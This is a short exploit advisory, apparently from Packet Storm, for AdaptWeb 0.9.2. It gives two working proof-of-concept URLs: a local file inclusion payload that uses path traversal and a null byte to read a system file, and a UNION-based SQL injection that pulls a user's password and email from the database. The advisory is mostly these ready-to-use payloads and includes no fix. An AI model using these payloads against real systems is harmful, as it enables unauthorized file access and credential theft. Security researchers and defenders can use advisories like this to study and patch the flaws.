AdaptWeb version 0.9.2 suffers from local file inclusion and remote SQL injection vulnerabilities.
d4add75fa25385d92452041623a88df0efa077f1ed23a576e5d434b05ae11008#################################################################################################################
[+] AdaptWeb 0.9.2 (LFI/SQL) Multiple Remote Vulnerabilities
[+] Script : http://adaptweb.sourceforge.net/
[+] Discovered By SirGod
[+] www.mortal-team.org
#################################################################################################################
[+] Script homepage : http://adaptweb.sourceforge.net/
[+] Local File Inclusion
- PoC
http://127.0.0.1/[path]/index.php?newlang=../../../../../../BOOTSECT.BAK%00
[+] SQL Injection
- PoC
http://127.0.0.1/[path]/a_index.php?opcao=TopicosCadastro1&CodigoDisciplina=null+union+all+select+concat_ws(0x3a,senha_usuario,email_usuario)+from+usuario+where+id_usuario=1--&numtopico=1
#################################################################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed